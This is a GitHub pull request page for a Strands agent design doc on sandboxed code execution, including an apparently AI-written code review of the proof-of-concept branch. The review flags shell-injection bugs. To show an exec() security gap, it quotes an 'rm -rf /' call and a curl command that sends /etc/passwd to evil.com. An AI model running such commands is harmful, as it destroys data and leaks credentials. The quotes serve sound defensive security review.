docs(designs): sandboxes and code execution by mkmeral · Pull Request #681 · strands-agents/docs

mkmeral · 2026-03-18T21:00:13Z

Description

Design doc proposing three layered additions to Strands:

A Sandbox abstraction (SDK-level) that decouples tool logic from execution environment. Tools delegate to tool_context.agent.sandbox instead of managing their own subprocesses and filesystem access. The agent defaults to LocalSandbox, so existing behavior is preserved. DockerSandbox and AgentCoreSandbox provide isolation for production and cloud deployments. The interface follows the minimal execute() pattern validated by LangChain DeepAgents, E2B, and Daytona.
A tooling layer that updates existing tools (shell, python_repl, file_read, file_write) to use the sandbox, adds a new stateless python tool, and introduces programmatic_tool_caller — a tool that lets the model write Python code to orchestrate other tools, reducing API round-trips and keeping intermediate results out of context.
A CodeActPlugin that implements the CodeAct paradigm (Apple ML Research) via Strands' hook system. Uses AfterInvocationEvent.resume for the observation loop: model generates code, plugin executes it, feeds results back as next observation. No custom agent loop needed.

The doc also covers a tool proxy design for running model-generated code fully inside the sandbox with tool calls proxied back to the host via HTTP, implemented incrementally (host-process first, proxy later).

Includes prior art survey of E2B, Daytona, LangChain DeepAgents, OpenHands, Google ADK, and Anthropic SRT.

Related Issues

Type of Change

New content

Checklist

I have read the CONTRIBUTING document
My changes follow the project's documentation style
I have tested the documentation locally using npm run dev
Links in the documentation are valid and working

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.

Introduces a Sandbox abstraction that decouples tool logic from execution environment, enabling tool reuse across local, Docker, and AgentCore sandboxes. Covers three layers: Sandbox interface (SDK-level), tooling updates including programmatic tool caller, and CodeAct plugin for code-based tool orchestration. Includes prior art survey of E2B, Daytona, LangChain DeepAgents, OpenHands, Google ADK, and Anthropic SRT.

- Rename to 'Sandboxes and code execution' - Rewrite CodeAct plugin to use AfterInvocationEvent.resume for the observation loop instead of wrapping the agent - Fix programmatic tool caller to run in host process, not sandbox - Add open questions for namespace injection, cwd persistence, and parallel execution with research in Appendix C - Fix duplicate shell example, dead variable, broken appendix link - Add python tool description

- Add tool proxy section to Layer 1 with incremental rollout plan - Fix contradiction between programmatic tool caller steps and relationship to sandbox section - Fix async exec issue in CodeAct (wrap in async main) - Remove redundant open question 1 (now covered by tool proxy section) - Fix import paths: sandbox implementations live in SDK - Add sandbox isolation row to comparison table - Wrap appendices in details/summary tags

github-actions · 2026-03-18T21:13:51Z

Documentation Preview Ready

Your documentation preview has been successfully deployed!

Preview URL: https://d3ehv1nix5p99z.cloudfront.net/pr-cms-681/docs/user-guide/quickstart/overview/

Updated at: 2026-03-19T22:10:28.182Z

mkmeral · 2026-03-19T18:50:00Z

Related POC branch and notebook

agent-of-mkmeral · 2026-03-19T19:11:17Z

Initial agent review

## 🔍 Deep Review: Sandboxes & Code Execution Design + POC Branch

I've reviewed the full design document (1058 lines), the POC branch (mkmeral/sdk-python@feat/sandbox-abstraction), all implementation files, all test files, and the demo notebook. Below is a no-holds-barred analysis.

✅ What Works Well

The overall architecture is sound. Three things stand out:

Option A (minimal execute()) is the right call. The prior art validates it, and the POC proves it — LocalSandbox, DockerSandbox, and AgentCoreSandbox all implement execute() cleanly, with native overrides where it matters.
Agent-level sandbox (not tool-level) is correct. The shared-filesystem argument is convincing, and the implementation is clean: Agent.__init__ takes sandbox, defaults to LocalSandbox(), tools access via tool_context.agent.sandbox.
Hook-based CodeAct via AfterInvocationEvent.resume is elegant. It avoids a parallel CodeActAgent class and composes with existing agent features.

🐛 Bugs in the POC Branch

Bug 1: `write_file` heredoc injection — content containing `STRANDS_EOF` breaks writes

Files: base.py:133, docker.py:249

# base.py
result = await self.execute(f"cat > '{path}' << 'STRANDS_EOF'\n{content}\nSTRANDS_EOF")

If content contains the literal string STRANDS_EOF on its own line, the heredoc terminates early, silently truncating the file or causing a shell syntax error. This is a data corruption bug — any file that happens to contain that string will be silently mangled.

Fix: Use a randomized delimiter:

import secrets
delim = f"STRANDS_EOF_{secrets.token_hex(8)}"
result = await self.execute(f"cat > '{path}' << '{delim}'\n{content}\n{delim}")

Or better yet: for LocalSandbox, just use native file I/O (which the POC already does, so base.py fallback only matters for custom sandboxes that don't override). For DockerSandbox, use docker cp with stdin piping instead of heredoc.

Bug 2: `write_file` path injection in `base.py` — unescaped single quotes in path

File: base.py:133

result = await self.execute(f"cat > '{path}' << 'STRANDS_EOF'\n{content}\nSTRANDS_EOF")

If path contains a single quote (e.g., /tmp/it's a file.txt), this produces a broken shell command. The docker.py version uses shlex.quote() (good!), but base.py does not.

Fix: Use shlex.quote(path) in base.py too (for read_file, write_file, list_files).

Bug 3: `execute_code` shell escaping is incomplete

File: base.py:97

escaped = code.replace("'", "'\\''") 
return await self.execute(f"{language} -c '{escaped}'", timeout=timeout)

This single-quote escaping handles the common case but breaks on code containing literal $ (variable expansion in some shells), or backticks. Multi-line code with actual newlines can also cause issues depending on the shell.

More robust approach:

import shlex
return await self.execute(f"{language} -c {shlex.quote(code)}", timeout=timeout)

Bug 4: `AgentCoreSandbox` is NOT imported in `sandbox/init.py` but IS re-exported from `strands/init.py` indirectly

Looking at sandbox/__init__.py — AgentCoreSandbox is correctly excluded (good). And strands/__init__.py also correctly excludes it. This is fine actually.

But DockerSandbox IS re-exported from strands/__init__.py at the top level. This means from strands import DockerSandbox works on systems without Docker. That's fine (error at runtime), but it's worth documenting clearly.

Bug 5: `DockerSandbox.write_file` docstring says "using docker cp" but implementation uses heredoc

File: docker.py:228

async def write_file(self, path: str, content: str) -> None:
    """Write a file into the container using docker cp."""  # <-- WRONG
    # Actually uses: cat > path << 'STRANDS_EOF'\n...\nSTRANDS_EOF

The same heredoc injection bug as Bug 1 applies here too.

Bug 6: `_parse_stream_result` checks `isError` at wrong nesting level

File: agentcore.py:147

is_error = response.get("isError", False)  # checks top-level response

But the response structure has stream[].result at the event level while isError is at the top level. Depending on the actual AgentCore API response format, isError might be per-event, not per-response. This should be validated against the real API schema.

Bug 7: `LocalSandbox.write_file` has a ternary expression used as statement

File: local.py:96

os.makedirs(os.path.dirname(full_path), exist_ok=True) if os.path.dirname(full_path) else None

This works but is against Python style conventions. Should be:

parent = os.path.dirname(full_path)
if parent:
    os.makedirs(parent, exist_ok=True)

🏗️ Design Issues

🚨 Issue 1 (Showstopper): The async interface doesn't match the sync SDK

The entire Sandbox ABC is async. Every method is async def. But the Strands SDK agent loop is synchronous. The @tool decorator produces sync functions. The current shell, python_repl, file_read, file_write — all sync.

The POC tools (run_command, python_tool, programmatic_tool_caller) are all async def. How do async sandbox tools get called from the synchronous agent loop?

The tests work because pytest-asyncio runs them in an event loop. But in a real Agent(tools=[run_command_tool]) call, the sync agent loop would need to asyncio.run() or loop.run_until_complete() the async tool — and if there's already a running loop (e.g., Jupyter), that creates a nested event loop problem.

This is the biggest design gap. Options:

Make Sandbox have both sync and async interfaces
Make the SDK's tool execution path async-aware (big SDK change)
Add sync_execute() wrappers with asyncio.run() internally
Make Sandbox synchronous by default with an optional async variant

I'd lean toward option 4 for the initial implementation. The design doc should address this explicitly.

🚨 Issue 2 (Showstopper): `programmatic_tool_caller` wrapper await bug

File: programmatic_tool_caller.py:53-57

async def wrapper(**kwargs: Any) -> Any:
    caller = getattr(agent.tool, tool_name)
    return caller(**kwargs, record_direct_tool_call=False)

The wrapper is async and the model's code does result = await calculator(expression="2+2"). But agent.tool.calculator() returns a synchronous result (a string like "4").

In the tests this works because MagicMock() return values are MagicMock objects which happen to be awaitable. With real tools, await calculator(expression="2+2") would raise TypeError: object str can't be used in 'await' expression.

Wait — actually, async def wrapper returns the value, and await wrapper() awaits the coroutine (the async function itself), not the return value. So await wrapper() works fine even if caller() returns a string. The await is on the coroutine wrapper, which resolves to the string. My mistake — this is actually correct. Disregard this specific bug.

However, there's still a subtlety: if agent.tool.X() itself is async/returns a coroutine (which could happen with sandbox-based tools), the wrapper wouldn't await it. But for Phase 1 (sync tools), this works.

Issue 3: `LocalSandbox` loses `cd` state — the design discusses it but the POC ignores it

Open Question 2 correctly identifies this. But the POC LocalSandbox uses a new subprocess per execute() call:

await sandbox.execute("cd /tmp/workspace")
await sandbox.execute("pwd")  # prints the original working_dir, NOT /tmp/workspace

The existing shell tool has CommandContext for this. Migrating shell to use sandbox breaks cd persistence. This is a regression for any tool migration.

Issue 4: `programmatic_tool_caller` uses `exec()` with full builtins

namespace: dict[str, Any] = {"__builtins__": __builtins__}

Model-generated code gets access to __import__, eval, exec, open, os, sys, etc. The model can:

import os; os.system('rm -rf /')
import subprocess; subprocess.run(['curl', 'http://evil.com', '-d', open('/etc/passwd').read()])

Phase 1 acknowledges this runs in host process, but there's no opt-in safety. Even a basic allowlist would help.

Issue 5: No streaming/real-time output support

ExecutionResult captures stdout/stderr as complete strings. For long-running commands, there's no way to stream output. The current shell tool has real-time PTY output. Migrating to Sandbox.execute() loses this.

Issue 6: Environment variable propagation is underspecified

DockerSandbox takes environment at construction time. But export FOO=bar in one execute() doesn't persist to the next (since docker exec starts a new process). The design discusses cd but not export.

📝 Design Doc Nits

Layer diagram box-drawing characters may not render in all markdown contexts
CodeActPlugin example references self.namespace["__stdout__"] but never sets it — needs redirect_stdout like programmatic_tool_caller
"up to 98.7% token reduction" claim should be presented more cautiously with methodology context
Tool proxy says "httpx must be available inside the sandbox" — python:3.12-slim doesn't include httpx. Need to bootstrap dependencies
CodeAct is P2 but is the most architecturally ambitious. Consider a minimal CodeAct POC as P1 to validate the resume-based approach early

🔬 POC Branch Code Quality

Overall good — clean docstrings, proper type hints, comprehensive tests:

✅ 6 test files covering all components
✅ Good use of mocks for Docker/AgentCore
✅ The notebook is excellent for onboarding
❌ Missing integration tests (all Docker/AgentCore are mocked)
❌ MockSandbox and _make_tool_context duplicated across test files — needs shared conftest.py

🎯 Summary: Showstoppers vs. Nice-to-Haves

Must Fix Before Merging

🚨 Async/sync mismatch (Issue 1) — the tool layer can't work with the current sync SDK
Heredoc injection (Bug 1, 5) — data corruption risk
Shell escaping in base.py (Bug 2, 3) — path and code injection

Should Fix

cd persistence regression (Issue 3)
Security of exec() with full builtins (Issue 4)
Misleading docker cp docstring (Bug 5)
Ternary-as-statement style issue (Bug 7)

Nice to Have

Streaming output support (Issue 5)
Shared test fixtures (conftest.py)
Integration tests
More cautious token reduction claims

The overall vision is strong, the prior art survey is thorough, and the layered design with incremental phases is practical. The async/sync question is the key architectural decision that needs resolution before implementation proceeds.

cc @mkmeral

…eedback - Change execute() to AsyncGenerator that yields output lines and final ExecutionResult, matching SDK's existing async tool streaming - Add State management section to Layer 1 with stateless-by-default recommendation and rationale (concurrency safety) - Move state discussion out of open questions into proper design section - Explicitly address cd and export persistence in stateless model - Update shell tool example to show streaming pattern - Update TypeScript interface to match

Update Option A interface, tool examples, TypeScript SDK, and all three Appendix A implementation sketches to match the actual code. Main body: - Replace AsyncGenerator streaming with direct ExecutionResult return - Use shlex.quote() for shell escaping in convenience methods - Use randomized heredoc delimiter (secrets.token_hex) in write_file - Remove _execute_to_result() helper (not needed without streaming) - Update tool usage examples (shell, my_tool) to use await pattern - Update TypeScript interface to use Promise<ExecutionResult> Appendix A — LocalSandbox: - Add timeout error handling (proc.kill() on TimeoutError) - Add absolute path resolution (os.path.isabs check) - Add os.makedirs for parent directory creation in write_file - Add class docstring Appendix A — DockerSandbox: - Replace ... placeholders with full implementation - Add _run_docker helper with stdin_data support - Add stdin pipe approach for write_file (no heredoc injection) - Add shlex.quote for safe path handling - Add working_dir parameter and container lifecycle - Add timeout handling Appendix A — AgentCoreSandbox: - Fix import path (bedrock_agentcore.tools.code_interpreter_client) - Add _parse_stream_result helper for response parsing - Add list_files override with native API - Add uuid-based default session naming - Add stop() method - Add proper error handling in read_file/write_file

lizradway · 2026-03-23T17:13:45Z